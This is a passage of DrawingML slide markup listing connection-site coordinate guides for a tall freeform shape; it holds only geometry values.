              <a:gd name="connsiteY45" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 427604 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 453239 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 454972 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 458715 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 504159 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 266285 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY96" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY97" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY98" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY99" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY100" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY101" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY102" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY103" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY104" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY105" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY106" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY107" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY108" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY109" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY110" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 151770 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 143794 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 161862 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 265826 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 258031 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 319080 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 345956 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 375505 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 408998 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 418597 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 430843 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 438184 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 441487 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 442471 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 444782 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 448545 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 455016 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 459335 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 427604 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 453239 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 454972 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 458715 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 504159 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 266285 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY96" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY97" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY98" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY99" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY100" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY101" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY102" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY103" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY104" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY105" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY106" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY107" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY108" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY109" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY110" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 151770 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 143794 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 161862 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 265826 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 258031 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 319080 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 345956 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 375505 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 408998 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 418597 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 430843 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 438184 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 441487 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 442471 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 444782 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 5125185 h 6858000"/>
